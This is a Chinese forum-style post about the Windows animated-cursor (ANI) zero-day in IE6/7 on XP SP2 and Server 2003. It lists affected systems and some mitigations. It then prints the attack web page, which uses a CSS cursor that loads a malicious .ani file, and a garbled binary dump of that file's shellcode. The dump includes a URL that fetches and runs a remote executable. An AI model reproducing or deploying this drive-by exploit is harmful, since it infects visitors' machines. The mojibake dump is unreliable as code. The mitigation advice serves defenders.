根据FrSIRT的漏洞报告, 受影响的系统包括:
Microsoft Windows XP Service Pack 2
Microsoft Windows Server 2003 Service Pack 1
Microsoft Internet Explorer 6 for Windows XP Service Pack 2
Microsoft Internet Explorer 6 for Windows Server 2003 SP1
Microsoft Windows Internet Explorer 7 for Windows XP SP2
Microsoft Windows Internet Explorer 7 for Windows Server 2003 SP1
利用鼠标指针文件下载并运行恶意程序,当用户访问嵌入了恶意代码的网页,恶意程序将被自动下载到用户的IE临时目录并得到执行
解决方法:
1.临时补丁包此帖附件. Windows ANI ZeroDay Patch Setup.zip
2.运行gpedit.msc-->计算机配置-->windows 设置-->软件限制策略-->其它规则
看到了吧,在里面把临时文件夹目录添加上,设置安全级别:不允许
3.此方法仅限于 NTFS 磁盘格式:
对$ProgramFiles\Internet Explorer 目录做访问权限设置. 去除当前登陆用户对其目录的写入权限.
病毒利用网页代码
<html>
<body>
<script type="text/jscript">function init() { document.write("<h1>5201413.com<h1>");}window.onload = init;</script>
<DIV style="CURSOR: url(''./o.o'')">
</DIV>
</body>
</html>
o.o程序代码(不可用)
程序代码
RIFF ACONanih$ $ TSIL TSIL anihR 01230123012301230123012301230123 444444444444444444444444444 ?嬱d?0 峈€:勅 ?鐺 h j 泄 孁?^螭需??W鑻 孁3蒊3腊命虍岹_瞄? [侅 嬙>?cmd >荁/c "兟3繮Ph RSP? 袐鼖莾?>?勠t@膂> "3?圥冹T3?蹕虄鳷} >?兝腧嬏嬞兠3?荂, QSPPPPPPWP韫 ? 恓 脌8Ut亁悙悙tU嬱岪鄅on hurlm?岲$P?P瑕 胩栝兡胘lhntdl?岲$P?P鑲 毹栝兡胔32 huser?岲$P桎?P鑋 雭栝兡描_ h鞐 P鑪 兡描K h
|P鑖 兡描7 hrP鑂 兡描MhO颫P? 兡描 h嶯霵? 兡?纃婡0吚x>婡 >媝?婡秒 >婡4兝|>婡<胉6媗$$6婨<6婽x?婮>媄 葶;I>???3傈瑒纓料
?;|$(u?媄$輋>?K>媄????塂$a描?http://www.5201413.com/exe.exe
目前已经出现2个以上的变种`而且无官方补丁`OD程序到处都有...